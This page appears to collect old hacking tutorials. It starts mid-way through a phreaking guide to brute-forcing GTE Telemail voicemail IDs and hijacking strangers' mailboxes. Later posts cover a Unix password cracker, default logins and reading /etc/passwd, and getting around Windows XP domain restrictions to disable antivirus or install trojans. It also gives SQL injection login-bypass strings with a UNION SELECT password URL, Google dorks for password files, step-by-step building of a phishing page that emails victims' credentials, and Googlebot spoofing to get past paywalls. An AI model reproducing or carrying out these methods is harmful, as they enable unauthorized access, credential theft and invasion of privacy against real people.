You would dial the number and everything, press the pound sign, and hit the key that had the "1230" on it, or if you didn't have that kind of fone, you would dial the "1230" manually. You would then dial a "00". If that was invalid, and the recording began saying "We're sorry....", you hit the asterisk, and then cross out the zero (not the farthest one on the left).

If the code didn't work, you would go on to the next number. In the example, you would be dialing "01". If the "123001" didn't work, you'd cross out the "1" and go onto "02".

GTE Telemail only gives you three tries at getting an id code. On the third try, you will get this kind of recording (which, by the way, you can abort, and hit "*" where it will just hang up on you): "We are still unable to process your id. For assistance, please call 800-527-1149. Thank You" <click>.

Now, let's say that you didn't get one of these recordings, but you heard a short beep after you entered in the whole id. That means you got a working id code! On your chart, don't cross out the number, but circle it. In the notebook, write out the entire 6 digit id code.

If there are no messages on the box, just hit the asterisk until you hear "good-bye", and go onto the next number on your chart. If there ARE messages, you want to read them without the owner knowing. In some situations, that's impossible, but just don't kill anybody's messages.

You want to try to keep all NEW messages NEW, so that if the original owner of the box calls up, he will still have the same messeage. GTE operators throw a pissy fit if the messages aren't going through, and they order all of these conferences with their customers. Anyhow, if there is only 1 new message, after you've listened to it, press the "*" button, and that will keep the message new. If there are more than one, press "7" to put the message into the "saved messages bank" after you have listened to them, except for the last message, which you can still keep as new by hitting the asterisk.

Reading saved messages is easier because nobody has to know that you did it. Usually after reading your new messages, the system will say, "beginning saved messages" if there are any. Otherwise, just dial "012" from the main menu for the saved messages. Remember to save all of these messages with the "7" button.

Now, the object here, when listening to all of these messages is to find out as much information as possible about the owner of that id code, and the people that are sending the message to that box. Let's say you are listening to a message, and you hear this: "John, this is Michael". That's great, you would scratch down "John - Michael" in your notebook right after where you wrote down that box's id number. This will remind you that John owns that box, and Michael sent the message to him.

If you EVER hear them

giving out the 7 digit address codes over a telemessagenger, be sure to write that down too. Any other information is handy, too.
Now, what on earth are you going to do with all of this information? You're going to set up your own boxes! Or at least take over other people's boxes. The first method is called "Read and Reply". Let's say, for example, you had one box, and a message was sent that said, "Hello John, this is Michael.", and on another box, you heard a message that said, "Hello Michael, this is Judy", you might have a match. You see, since you now know Michael's box number, and Michael sent a message to this John dude, all you have to do is go to the first box and reply to the message that Michael sent, and it will be sent back to Michael's box. So, this is exactly what you must do if you think you have a match (I will use the example above for references to make this easier):

Ex.:

Id Code: 123000 had a message to John, from Michael
Id Code: 123050 had a message to Micahael, from Bubba.

Ok, so you think that you have a match. You would go to the box that had the message >FROM< the guy who's box you know. In other words, you would dial "12300", and listen to the John/Michael message again. Press the "4" button to fast forward through the message, until you hear the beep. Dial a "022" to reply to the message. You would then dial a "1" to begin your message recording, where you would say the last 3 digits into the phone (in this case, you would say "000"), and press "5" to end the recording. It will then say "You reply has been sent. You may now dial 022 to reply...etc". Just press the asterisk until it says "good-bye", and call back. When you get on, get onto the id number 123050, because that's the id that you think is the same that sent that John dude a message. If there is a new message, with your voice saying "000" into it, you got it! More on this in a second.

Don't cry if the boxes don't match up and the message doesn't go through. There is still a chance that there are other people with the same name. Just set them up the same way. Now, if, when you first listened to the messages on a box, heard your voice saying three digits, but you never tried matching them up, then you just got a box! Write down the two numbers together somewhere.

If you have two matches, this is what you do... I am going to use the examples above with the 123000 and 123050 boxes. Ok, now you have two boxes that are "linked" through messages. Your next mission is to get both boxes to have messages from one another that have YOUR voice on it, and to kill all other messages. In this example, this is what you would do: Get onto the 123000 box and reply to the "from michael" message. For your message, don't say anything, just have about 7 seconds of silence, and then finally hit "5" to finish the message. Next, you would go to the 123050 box, and would listen to the 7 seconds of silence message that you just sent. Reply back to this, and do the same thing. So now, both boxes have these "7 seconds of silence" or "blank" messages in their boxes. Next, you would go to both boxes and kill all of the other messages in the box. Everything, even the "michael" message goes. You have now siezed the box, and it is at your will. You must pick one box to be your "update" box, and the other to be your "pickup" box. The "Update" box is the one that will have your greeting message on it, like "You've dialed Master Micro's box, to send him a message, dial 022 after the tone." The "Pickup" line is the box that will be used for only YOU, where you read messages that other phreaks have left you. To set these up, do the following: Go to the box you picked as your "pickup" line. Read the blank message and reply to it. For the message, say whatever, like "This is so-and-so's box, dial 022 after the beep to reply". You then dial up the update line, read the welcome message that you just sent, and hit "7" after listening to it to save it. You'll hear the blank message somewhere, either as your new or your saved message. Kill the blank message on the update line. Now, if you ever wanted to change your greeting message, go to the pickup line, record a new message by replying to the blank one; go to the update line, and kill the old greeting that you don't want, and save the new one.
Once you have your box set up, all you have to do is give all your phreak phriends the address and instructions to the update line. Tell them to save the messages when they read it, and to reply to it using 022 if they want to send you a message. Occassionally, check your pickup line for new messages, and kill them after you have read them just in case the owner of the box catches on and changes his id code.

The other method to set up boxes is used mainly for setting up codelines, or other kinds of boxes where you don't want replies, or it is not totally necessary to have replies. A codeline is a voice box that you have devoted to telling your phriends new codes, and any other new info. Setting these up are easy as hell, and you can make as many as you want, but there is a catch. You must have figured out both the 7 digit address code, and the 6 digit id code for the same box. Let's say there was a dude named Frank, and his address code (the number you dial as soon as you get on, instead of dialing the pound key and id number, to send the guy a message) was "1234567", and his id code was "098765". First, to find out if the address and the id code are the same, you do the same method of matching up first names. Call up the telemail service, and instead of dialing the pound key and everything, dial the 7 digit address code, and send a message saying something like, "yess umm.. <click>" and hit 5. They'll think it's a screwed up message that didn't go through if the address and the id code aren't for the same box. Anyways, after you send the message, you'll be hung up on by GTE. Just call back, and this time enter the pound and the 6 digit id code (in this case, 098765). If there is a message that says, "yess umm.. ", then you go it! Then next thing you do is jump up and down and pop yourself open a brewski.

After you've popped open your brewski, make sure you are still coherent enough to set up a codeline, or whatever else you want to set up. I was gonna set up those 1-212-970-XXXX phone sex recordings on a few, because you can set up as many as you want; just to amuse the kiddies, and show them your power. Anyhow, whip out your notebook, and pick a box that has no messages in it. If you don't have any, then pick a box, and go to it, and kill off all of the messages. Go to that box, and after the recording tells you that you have no new and no saved messages, you will be given a menu. Dial the address code of the box that you have the id and address to (in this case, 1234567). Enter a message, that says anything you want -- if you can't think of anything, just do the 'ole blank message. Save it and everything. You then dial the asterisk until you get hung up, and then call back again. This time, enter the id code of the box that you have both the addr and id to. When you hear the message that you just sent from the other box, reply to it, and in that message, put whatever you want into it. After you are done, just kill the message you just heard, so there is nothing on the box that you have both info for. Now, you can screw around with the other box that you set up, but try not to have any messages, or anything screwy on the both you have both things for. If you do, you're just going to wind up having it dead, so that's my warning. Tell people, when you give out the other box number, the one you just set up, not to reply to send you messages.

Ok, now, going back to near the beginning of the file, about talk of the chart, let's say you went from 00 to 99, and you've filled out your chart. The prefix you were using was: 1230. You would then change that "0" to a "1". So your new four number prefix would be 1231. Keep doing this until you are bored, or you have gone up to 1239. Then, you have to pick a new Texan prefix, and start with 0 again. Now, that's a lot of numbers...

Also, that 1-800 number is not the only one in the country. There are several others. There is probably a GTE in lots of the major states. If you find any new numbers, look for prefixes for THAT state and not Texas. Shit, I don't even live in Texas. I live in Russia.

"This is Master Micro for the Underground America Codeline............." Thank You for your support.

Special Thanks to Mr. Xerox - who if I didn't blow school for that day, and he didn't blow work, would have never found out the formats for GTE Telemail. Also, because of his board, him and I started hacking and phreaking again, and without Underground America, I wouldn't be typing this file right now.

Video Mail

naveen98859 — Fri, 20 Mar 2009 10:39:40 CDT

HI this is a new video mail services you can send me your video as a mail to me through this so please click reply and send me your VIdeo Mail.

A brute force approach to hacking Unix passwords

naveen98859 — Tue, 17 Mar 2009 02:59:26 CDT

Here's how to use it in a nutshell...
Download the passwd file from your local unix site, or have someone download it for you. It should be in the unix format (that is, line feeds but no carriage returns) so don't run it through any conversion programs--Brute uses it "as-is".
To check a single password against your list do this:

BRUTE passwd Password

(that would check the passwd file for the password "Password"). Brute is case sensitive (just as unix is), so "Password" is different than "password".

To convince yourself that brute actually works you'll probably want to run it with your password and see that it pulls up your account. It will.
Brute can be used with a list of passwords. In this case, edit up a list or use a pre-made one (one password per line) and call brute like this:

BRUTE passwd @passlist.txt

(where passlist.txt is the name of your list-of-passwords. The @ sign tells brute that you're using list file). Note that you don't have to use the name "passlist.txt" for your word list, and you don't have to use the name "passwd" for the password file. This allows you to keep separate word lists for different types of unix sites, and separate password files.
Right now that's about it. There are a few enhancements I'm planning in the future, but this ought to do the trick for you. Any passwords found are written to the file "PWD_HITS.DAT".

Brute ignores unpassworded and invalidly-passworded accounts automatically, so you should probably check the passwd file for these babys yourself.

Brute is about 25% faster than it's nearest competitor.
Have fun.
Prometheus

Version 1.1: Fixed the icky short int bug which causes the "Password" counter to go negative after 32k attempts (changed to long int--now it will go negative should you reach 2 billion attempts in a single setting, which isn't extrememly likely. Added the "*" password to check for the username as a password (forward and reversed). Either put * on a line by itself in your word list file, or call brute like this: brute passwd *
Version 2.0: I'm using the fastcrypt routine as ported to DOS by Gandalf and distributed in OBJ form by sir hackalot. I haven't measured the speed increase, but it's not as much as I had hoped. Maybe twice as fast. Anyhow, such is life.

Beginners guide to hack Unix

naveen98859 — Wed, 04 Mar 2009 01:39:45 CST

In the following file, all references made to the name Unix, may also be substituted to the Xenix operating system.
Brief history: Back in the early sixties, during the development of third generation computers at MIT, a group of programmers studying the potential of computers, discovered their ability of performing two or more tasks simultaneously. Bell Labs, taking notice of this discovery, provided funds for their developmental scientists to investigate into this new frontier. After about 2 years of developmental research, they produced an operating system they called "Unix".

Sixties to Current: During this time Bell Systems installed the Unix system to provide their computer operators with the ability to multitask so that they could become more productive, and efficient. One of the systems they put on the Unix system was called "Elmos". Through Elmos many tasks (i.e. billing,and installation records) could be done by many people using the same mainframe.

Note: Cosmos is accessed through the Elmos system.

Current:Today, with the development of micro computers, such multitasking can be achieved by a scaled down version of Unix (but just as powerful). Microsoft,seeing this development, opted to develop their own Unix like system for the IBM line of PC/XT's. Their result they called Xenix (pronounced zee-nicks). Both Unix and Xenix can be easily installed on IBM PC's and offer the same functions (just 2 different vendors).

Note:Due to the many different versions of Unix (Berkley Unix, Bell System III, and System V the most popular) many commands following may/may not work. I have written them in System V routines. Unix/Xenix operating systems will be considered identical systems below.
How to tell if/if not you are on a Unix system: Unix systems are quite common systems across the country. Their security appears as such
Login; (or login;)
password:

When hacking on a Unix system it is best to use lowercase because the Unix system commands are all done in lower- case.
Login; is a 1-8 character field. It is usually the name (i.e. joe or fred) of the user, or initials (i.e. j.jones or f.wilson). Hints for login names can be found trashing the location of the dial-up (use your CN/A to find where the computer is).

Password: is a 1-8 character password assigned by the sysop or chosen by the user.Common default logins
login_________Password:

root _________root,system,etc..

sys _________sys,system

daemon________daemon

uucp ________uucp

tty ________tty

test__________test

unix__________unix

bin___________bin

adm___________adm

who___________who

learn_________learn

uuhost________uuhost

nuucp_________nuucp

If you guess a login name and you are not asked for a password, and have accessed to the system, then you have what is known as a non-gifted account. If you guess a correct login and pass- word, then you have a user account. And, if you guess the root password, then you have a "super-user" account. All Unix systems have the following installed to their system: root, sys, bin, daemon, uucp, adm
Once you are in the system, you will get a prompt. Common prompts are:

$

%

#

But can be just about anything the sysop or user wants it to be.
Things to do when you are in: Some of the commands that you may want to try follow below:
who is on (shows who is currently logged on the system.)
write name (name is the person you wish to chat with)

To exit chat mode try ctrl-D.

EOT=End of Transfer.
ls -a (list all files in current directory.)
du -a (checks amount of memory your files use;disk usage)
cd\name (name is the name of the sub-directory you choose)
cd\ (brings your home directory to current use)
cat name (name is a filename either a program or documentation your username has written.
Most Unix programs are written in the C language or Pascal since Unix is a programmers' environment.
One of the first things done on the system is print up or capture (in a buffer) the file containing all user names and accounts. This can be done by doing the following command:

cat /etc/passwd

If you are successful you will a list of all accounts on the system. It should look like this:

root:hvnsdcf:0:0:root dir:/:

joe:majdnfd:1:1:Joe Cool:/bin:/bin/joe

hal::1:2:Hal Smith:/bin:/bin/hal

The "root" line tells the following info :
login name=root
hvnsdcf = encrypted password
0 = user group number
0 = user number
root dir = name of user
/ = root directory

In the Joe login, the last part "/bin/joe " tells us which directory is his home directory (joe) is.
In the "hal" example the login name is followed by 2 colons, that means that there is no password needed to get in using his name.Conclusion:
I hope that this file will help other novice Unix hackers obtain access to the Unix/Xenix systems that they may find. There is still wide growth in the future of Unix, so I hope users will not abuse any systems (Unix or any others) that they may happen across on their journey across the electronic highways of America. There is much more to be learned about the Unix system that I have not covered. They may be found by buying a book on the Unix System (how I learned) or in the future I may write a part II to this........

Breaking Xp passwords

naveen98859 — Wed, 04 Mar 2009 01:30:48 CST

A Loophole u never knew about

This works on WIn 2000 & WIN XP.

This can be used to gain access to the website you want to for free, and how you can gain access to 'control panel', and the various other tools of Widows that may have been blocked from your grasp like 'regedit' by the administrator. IT can be used in schools & colleges..
When u are at the log on screen, type in your username and password. NOW When you hit enter, and it comes up with the next screen, the rectangle one, immediatly pull out the network cable i.e. the cable wire.
Now u can log on without any restrictions because when the cable is pulled off then it does not download any settings from the server. Now you have access to control panel, & all the other features which had been blocked BUT there will be no network access. But that's cool because now we can access 'Internet options', click in the connections tab click the LAN settings, click the proxy settings, and in the little white box at the bottom we can specify websites that bypass the proxy server (eg www.yahoo.com) Now once you have changed the settings to what you wish, apply them and restart the computer. Now get someone else to log onto it because if you log in it will load the cached settings from your previous log in, then after the other person logs in, everyone that logs in after them included themselves will have the internet settings you specified.

Its only an 'Unplugging technique' to gain access to a comp. locked by the administrator.
Now you can gain access to msconfig, regedit, command etc disable the virus scanner, or to install a trojan or a virus according to u're will..
XP HOME ADVANCED FILE PERMISSIONS.!!
Access *Advance file Permissions* on NTFS file systems for XP Home simply by booting into *Safe Mode*, rt-clicking any file or folder, and navigating to the *Security tab*. This gives the user the ability to allow or deny read, write, execute, read & write, display contents, full-control, iheritance, and take ownership permissions, with many more options available to apply to different users and groups stored on the computer. Well, you don't have to do this in *Safe Mode* (XP Home). Although it is a little less intuitive, you can simply go to your command prompt - Start>All Programs>Accessories>Command Prompt. Now type cacls in the window (without the quotes). This gives you the ability to add, remove or modify file permissions on files and folders through the command prompt. Type cacls /? for help on different options and variables. You do not need to be in safe mode to use this so it makes it a little quicker than using the safe mode security tab GUI.

Remember - this only applies to NTFS. Here also is a very useful link to find a lot of extras and tweaks straight from the horse's mouth - the Microsoft Resource Center. You will find a lot of very useful web-based extra's here, most of them left unknowing to the general public - such as, "Online Crash Analysis" - a site that looks like Windows Update but you can upload your crash "dump logs" (when you get those system or application crash error reports). Microsoft will then analyze the log file and tell you some more info about WHY the system crashed (ie. faulty hardware/software/conflicts, etc).

How they hack your website

naveen98859 — Wed, 04 Mar 2009 01:20:55 CST

We hear the same terms bandied about whenever a popular site gets hacked. You know SQL Injection, cross site scripting, that kind of thing. But what do these things mean? Is hacking really as inaccessible as many of us imagine; a nefarious, impossibly technical twilight world forever beyond our ken?

Not really.
When you consider that you can go to Google right now and enter a search string which will return you thousands of usernames and passwords to websites, you realize that this dark science is really no mystery at all. You,ll react similarly when you see just how simple a concept SQL Injection is, and how it can be automated with simple tools. Read on, to learn the basics of how sites and web content management systems are most often hacked, and what you can do to reduce the risk of it happening to you.

SQL Injection

SQL Injection involves entering SQL code into web forms, eg. login fields, or into the browser address field, to access and manipulate the database behind the site, system or application.
When you enter text in the Username and Password fields of a login screen, the data you input is typically inserted into an SQL command. This command checks the data you,ve entered against the relevant table in the database. If your input matches table/row data, you,re granted access (in the case of a login screen). If not, you,re knocked back out.

The Simple SQL Injection Hack

In its simplest form, this is how the SQL Injection works. It,s impossible to explain this without reverting to code for just a moment. Don,t worry, it will all be over soon.

Suppose we enter the following string in a Username field:
’ OR 1=1 --
The authorization SQL query that is run by the server, the command which must be satisfied to allow access, will be something along the lines of:
SELECT * FROM users WHERE username = ‘USRTEXT ’
AND password = ‘PASSTEXT’
…where USRTEXT and PASSTEXT are what the user enters in the login fields of the web form.
So entering `OR 1=1 — as your username, could result in the following actually being run:
SELECT * FROM users WHERE username = ‘’ OR 1=1 — ‘AND password = ‘’
Two things you need to know about this:
[‘] closes the [username] text field.
'--' is the SQL convention for Commenting code, and everything after Comment is ignored. So the actual routine now becomes:
SELECT * FROM users WHERE username = ” OR 1=1
1 is always equal to 1, last time I checked. So the authorization routine is now validated, and we are ushered in the front door to wreck havoc.
Let’s hope you got the gist of that, and move briskly on.
Brilliant! I’m gonna go hack me a Bank!
Slow down, cowboy. This half-cooked method won’t beat the systems they have in place up at Citibank, evidently.

But the process does serve to illustrate just what SQL Injection is all about — injecting code to manipulate a routine via a form, or indeed via the URL. In terms of login bypass via Injection, the hoary old ’ OR 1=1 is just one option. If a hacker thinks a site is vulnerable, there are cheat-sheets all over the web for login strings which can gain access to weak systems. Here are a couple more common strings which are used to dupe SQL validation routines:
username field examples:

admin’—
’) or (‘a’=’a
”) or (“a”=”a
hi” or “a”=”a

… and so on.
Injection- Modules, Forums, Search etc.
Hacking web forms is by no means limited exclusively to login screens. A humble search form, for instance, is necessarily tied to a database, and can potentially be used to amend database details. Using SQL commands in search forms can potentially do some extremely powerful things, like calling up usernames and passwords, searching the database field set and field names, and amending same. Do people really get hacked through their search forms? You better believe it. And through forums, and anywhere else a user can input text into a field which interacts with the database. If security is low enough, the hacker can probe the database to get names of fields, then use commands like INSERT INTO, UNION, and so forth to get user information, change product prices, change account settings/balances, and just about anything else… depending on the security measures in place, database architecture and so on.

So you can have security locked down at the login, but poor security on other forms can still be exploited. Unfortunately this is a real worry regarding 3rd party modules for Web CMS products which incorporate forms, and for CMS products these 3rd party modules are often the weakest links which allows hackers access to your database.

Automated Injection There are tools to automate the process of SQL Injection into login and other fields. One hacker process, using a specific tool, will be to seek out a number of weak targets using Google (searching for login.asp, for instance), then insert a range of possible injection strings (like those listed above, culled from innumerable Injection cheat-sheets on the Web), add a list of proxies to cover his movements, and go play XBox while the program automates the whole injection process.

Remote Injection This involves uploading malicious files to inject SQL and exploit other vulnerabilities. It’s a topic which was deemed beyond the scope of this report, but you can view this PDF if you’d like to learn more.

SQL Injection in the Browser Address Bar

Injections can also be performed via the browser address bar. I don’t mean to have a pop at Microsoft, but when it comes to such vulnerabilities, HTTP GET requests with URLs of the following form are most often held to be vulnerable:
http://somesite.com/index.asp?id=10
Try adding an SQL command to the end of a URL string like this, just for kicks:
http://somesite.com/index.asp?id=10 AND id=11
See if both articles come up. Don’t shoot your webmaster just yet if it’s your own site and you get two articles popping up: this is real low-level access to the database. But some such sites will be vulnerable. Try adding some other simple SQL commands to the end of URLs from your own site, to see what happens.
As we saw above, access to the database raises a number of interesting possibilities. The database structure can be mapped by a skilled hacker through ill-conceived visibility of error messages — this is called database footprinting — and then this knowledge of table names and so forth can be used to gain access to additional data. Revealing error messages are manna - they can carry invaluable table name and structural details.
http://www.mydomain.com/products/products.asp?productid=123 UNION SELECT username, password FROM USERS
Cross Site Scripting (XSS)

XSS or Cross Site Scripting is the other major vulnerability which dominates the web hacking landscape, and is an exceptionally tricky customer which seems particularly difficult to stop. Microsoft, MySpace, Google… all the big cahunas have had problems with XSS vulnerabilities. This is somewhat more complicated than SQL Injection, and we’ll just have a quick look to get a feel for it.
XSS is about malicious (usually) JavaScript routines embedded in hyperlinks, which are used to hijack sessions, hijack ads in applications and steal personal information.

Picture the scene: you’re there flicking through some nameless bulletin board because, yes, you really are that lazy at work. Some friendly girl with broken English implores you to get in touch. ‘Me nice gurl’, she says. You’ve always wondered where those links actually go, so you say what the hell. You hover over the link, it looks like this in the information bar:
[%63%61%74%69%6f%6e%3d%274%74%70%3a%2f%2f%77%7…]

Hmmm…what the hell, let’s give it a bash, you say. The one thing I really need right now is to see an ad for cheap Cialis. Maybe the linked page satisfies this craving, maybe not. Nothing dramatic happens when you click the link, at any rate, and the long day wears on.
When a link in an IM, email, forum or message board is hexed like the one above, it could contain just about anything. Like this example, from SandSprite, which helps steal a session cookie, which can potentially be used to hijack a session in a web application, or even to access user account details.

Stealing cookies is just the tip of the iceberg though — XSS attacks through links and through embedded code on a page or even a bb post can do a whole lot more, with a little imagination.

For additional resources on this topic, here’s a great overview of XSS (PDF) and just what can be accomplished with sneaky links.

Authorization Bypass

Authorization Bypass is a frighteningly simple process which can be employed against poorly designed applications or content management frameworks. You know how it is… you run a small university and you want to give the undergraduate students something to do. So they build a content management framework for the Mickey Bags research department. Trouble is that this local portal is connected to other more important campus databases.
Authorization bypass, to gain access to the Admin backend, can be as simple as this:

Find weak target login page.
View source. Copy to notepad.
Delete the authorization javascript, amend a link or two.
Save to desktop.
Open on desktop. Enter anything into login fields, press enter.
Hey Presto.

Here’s a great video of a White Hat going through the authorization-bypass process on YouTube. This was done against a small university’s website. It’s a two-minute process. Note that he gets into the User 1 account, which is not the Admin account in this case. Is Admin User 1 on your User table?
Google Hacking
This is by far the easiest hack of all. It really is extraordinary what you can find in Google’s index. And here’s Newsflash #1: you can find a wealth of actual usernames and passwords using search strings.
Copy and paste these into Google:
inurl:passlist.txt
inurl:passwd.txt
…and this one is just priceless…
“login: *” “password= *” filetype:xls
Such strings return very random results, and are of little use for targeted attacks. Google hacking will primarily be used for finding sites with vulnerabilities. If a hacker knows that, say, SQL Server 2000 has certain exploits, and he knows a unique string pushed out by that version in results, you can hone in on vulnerable websites.

For specific targets Google can return some exceptionally useful information: full server configurations, database details (so a good hacker knows what kind of injections might work), and so forth. You can find any amount of SQL database dumps as well (fooling around with a Google hack while preparing this article, I stumbled across a dump for a top-tier CMS developer’s website). And a vast amount more besides.

johnny.ihackstuff is the man to go to for Google hacks. One interesting one I toyed with invited me to the Joomla! install page for dozens of sites… people who had uploaded Joomla!, decided against installing it, and subsequently had either left the domain to rot, or else set a redirect on the page to, say, their Flickr account (in one case). Allowing anybody to walk in and run through the installer. Other query strings target unprotected email/IM archives, and all sorts of very sensitive information. What fun we can have!
Password Cracking
Hashed strings can often be deciphered through ‘brute forcing’. Bad news, eh? Yes, and particularly if your encrypted passwords/usernames are floating around in an unprotected file somewhere, and some Google hacker comes across it.
You might think that just because your password now looks something like XWE42GH64223JHTF6533H in one of those files, it means that it can’t be cracked? Wrong. Tools are freely available which will decipher a certain proportion of hashed and similarly encoded passwords.
A Few Defensive Measures

If you utilize a web content management system, subscribe to the development blog. Update to new versions soon as possible.
Update all 3rd party modules as a matter of course — any modules incorporating web forms or enabling member file uploads are a potential threat. Module vulnerabilities can offer access to your full database.
Harden your Web CMS or publishing platform. For example, if you use WordPress, use Hardening_WordPress"this guide as a reference.
If you have an admin login page for your custom built CMS, why not call it ‘Flowers.php’ or something, instead of “AdminLogin.php” etc.?
Enter some confusing data into your login fields like the sample Injection strings shown above, and any else which you think might confuse the server. If you get an unusual error message disclosing server-generated code then this may betray vulnerability.
Do a few Google hacks on your name and your website. Just in case…
When in doubt, pull the yellow cable out! It won’t do you any good, but hey, it rhymes.

How to make fake web login page

naveen98859 — Wed, 04 Mar 2009 01:09:08 CST

This goes into more detail on how to create a fake page to login, and get redirected while it is sending a email of the password and username to your inbox. If you found this easy, then try out the post, How to Hack Gmail, Yahoo, Hotmail, Orkut or Any Other
Fake login page is a fake page which you can use to hack others username and password. Fake login page looks exactly like the original page and if someone login in your page using his original username and password, the username and password will be mailed to you The process of Hacking anyone,s id using fake login pages is known as Phishing

Now let,s learn how to create your very own fake login page.

Open www.jotform.com and Sign Up.
then Login there with your newly registered account.
now click on Create your first form
Now delete all the pre-defined entries, just leave First Name: (To delete entries, select the particular entry and then click on the cross sign.
Now Click on First Name: (Exactly on First Name). Now the option to Edit the First Name is activated, type there username: (for Gmail) or YahooId: (for Yahoo)
Now Click on Power Tool Option (In right hand side)
Double click on Password Box. Now Click the newly form password entry to edit it. Rename it as Password:
Now Click on Properties Option (In right hand side). These are the form properties.
You can give any title to your form. This title is used to distinguish your forms. This Title cannot be seen by the victim.
Now in Thank You URL you must put some link, like http://www.google.com or anything. Actually after entering username & password, user will get redirect to this url.(Don,t leave it blank
Now Click on Save. After saving, click on Source Option.
Now you can see two Options, namely Option1 & Option2. Copy the full code of Option2.
Now open Notepad text editor and write the following code their. Paste the Option2 code here
And now save this as index.html. And then host it, mean you will have to put it on the internet so that everyone can view it. Now i think that you would be knowing it and if in case you do not know it please leave a comment with your email-id and i will mail you how to do it. Now you can view it by typing the url in the address bar. NOTE: If u want to send it to the internet, then first you will have to create a hosting account which you can create on www.110mb.com and there are many other sites which you can find on the internet very easily.

I suppose that you created your account at 110mb.com now login to your account then click on File Manager, then click on upload files or just upload. Then select the file which you want to send to the internet and click on upload. And you are done. Now you can access you file on the net by just typing the url of the file. And you will receive password of the users that login to your site through email-id which you,ve entered while creating the form. see my fake login page

Secret Back doors to many websites

naveen98859 — Wed, 04 Mar 2009 01:01:29 CST

This artile is Donated by Catherine

Ever experienced this? You ask Google to look something up; the engine returns with a number of finds, but if you try to open the ones with the most promising content, you are confronted with a registration page instead, and the stuff you were looking for will not be revealed to you unless you agree to a credit card transaction first.

The lesson you should have learned here is: Obviously Google can go where you can,t.Can we solve this problem? Yes, we can. We merely have to convince the site we want to enter, that WE ARE GOOGLE. In fact, many sites that force users to register or even pay in order to search and use their content, leave a backdoor open for the Googlebot, because a prominent presence in Google searches is known to generate sales leads, site hits and exposure.

Examples of such sites are Windows Magazine, .Net Magazine, Nature, and many, many newspapers around the globe.How then, can you disguise yourself as a Googlebot? Quite simple: by changing your browser,s User Agent. Copy the following code segment and paste it into a fresh notepad file. Save it as Useragent.reg and merge it into your registry.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion Internet Settings5.0User Agent] @=Googlebot/2.1 Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion Internet Settings5.0User Agent] @=Googlebot/2.1? Compatible=+http://www.googlebot.com/bot.html

Please Remove The Spaces Between CurrenVersion Internet Settings

Voila! You,re done!You may always change it back again........ I know only one site that uses you User Agent to establish your eligability to use its services, and that,s the Windows Update site....... To restore the IE6 User Agent, save the following code to NormalAgent.reg and merge with your registry:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionInternet Settings5.0User Agent] @=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)